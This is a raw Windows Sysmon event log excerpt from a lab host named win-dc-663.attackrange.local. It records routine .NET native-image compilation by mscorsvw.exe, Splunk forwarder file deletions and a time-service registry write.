21:05:11.359{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5204-00000000CF01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.359{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5204-00000000CF01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.312{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5104-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.296{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5104-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.296{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5104-00000000CF01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:11.249{4DB9351A-A207-60D3-5004-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1878-0\SecurityAuditPoliciesSnapIn.dll2021-06-23 21:05:11.249 10341000x800000000000000021390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.124{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5004-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.093{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5004-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.093{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5004-00000000CF01}6264C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A208-60D3-5804-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A208-60D3-5804-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.937{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A208-60D3-5804-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.749{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A208-60D3-5704-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.718{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A208-60D3-5704-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.718{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A208-60D3-5704-00000000CF01}3920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:12.640{4DB9351A-A208-60D3-5604-00000000CF01}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\106c-0\SrpUxSnapIn.dll2021-06-23 21:05:12.640 10341000x800000000000000021413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A208-60D3-5604-00000000CF01}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.296{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A208-60D3-5604-00000000CF01}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.296{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A208-60D3-5604-00000000CF01}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.187{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A208-60D3-5504-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.140{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A208-60D3-5504-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.140{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A208-60D3-5504-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:05:12.110{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1938-0\SMSvcHost.exe2021-06-23 21:05:12.110 23542300x800000000000000021406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:12.000{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B98F10D0FC2D03DE8E8A7152ECC8DDA,SHA256=1D3517E932488BA09534CF28858A767FA9A74D6A7D7AD0C0D40896258CFFF8AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:13.203{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B18DD7CB9B082140B9252D7C00D6D7A7,SHA256=D67646ADAE37DD4116C354B3E39920700D097C3DE333A0498028FF66716707B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:13.031{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39AE0B24219050A5929437AA060AFCC6,SHA256=A817657CBD96BA0F257AEF673EEF49886CE288B23F12272675135608C9004327,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000021424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:05:14.484{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76873-0x763b4aab) 23542300x800000000000000021423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:14.031{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D7AEF905725A38B8190FD1F7BB110C3,SHA256=F94CF077CF7A62F25F012F599CFB92F4CC254379D4AE9BF262BF0CC4B12A619C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 